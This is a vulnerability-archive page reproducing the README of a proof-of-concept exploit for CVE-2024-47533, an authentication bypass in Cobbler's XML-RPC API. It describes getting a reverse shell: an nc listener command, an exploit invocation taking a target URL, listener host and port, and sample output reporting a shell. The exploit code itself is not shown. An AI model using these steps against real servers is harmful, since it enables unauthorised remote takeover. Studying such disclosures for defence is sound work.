Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY ¡ Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-47533 PoC — Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes

Source
https://github.com/00xCanelo/CVE-2024-47533-PoC
Associated Vulnerability
Title:Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes (CVE-2024-47533)
Description:Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
Readme
# CVE-2024-47533 – Cobbler XMLRPC Authentication Bypass → Reverse Shell (Unauthenticated RCE)

## 📌 Summary
This repository contains a **Proof-of-Concept (PoC) exploit** for **CVE-2024-47533**,  
a critical authentication bypass in Cobbler's XMLRPC API that leads to **unauthenticated remote code execution (RCE)**.

The exploit leverages the XMLRPC API's `login()` method flaw to bypass authentication and inject a reverse shell command via `background_import()`.

---

## ⚠️ Disclaimer
This tool is intended for **educational, research, and authorized penetration testing only**.  
Do **NOT** use it on systems you do not own or have explicit written permission to test.  
The author assumes **no liability** for misuse or damages.

---

## 🛠 Technical Details
- **Vulnerability Type:** Authentication Bypass → RCE  
- **Affected Component:** Cobbler XMLRPC API  
- **Attack Vector:** Network  
- **Privileges Required:** None  
- **User Interaction:** None  

**Root Cause:**  
`utils.get_shared_secret()` incorrectly returns `-1` due to mishandling file reads in binary mode with an encoding, allowing authentication with an empty username and `-1` as the password.

**Impact:**  
An attacker can:
- Gain admin-level API access
- Inject arbitrary system commands into Cobbler templates
- Spawn a reverse shell on the target

---

## 🚀 Usage

### 1️⃣ Clone the repository
```bash
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
```

### 2️⃣ Set up a listener
On your attacking machine:
```bash
nc -lvnp 4444
```

### 3️⃣ Run the exploit
```bash
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
```

**Example:**
```bash
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
```

---

## 📂 File Structure
```
.
├── CVE-2024-47533.py  # Reverse shell exploit script
└── README.md          # Documentation
```

---

## 📸 Example Output
```plaintext
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
```

---

## 🧑‍💻 Author
**00xCanelo**  
[GitHub Profile](https://github.com/00xCanelo)

---

## 📚 References
- [NVD: CVE-2024-47533](https://nvd.nist.gov/vuln/detail/CVE-2024-47533)
- [Cobbler Project GitHub](https://github.com/cobbler/cobbler)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →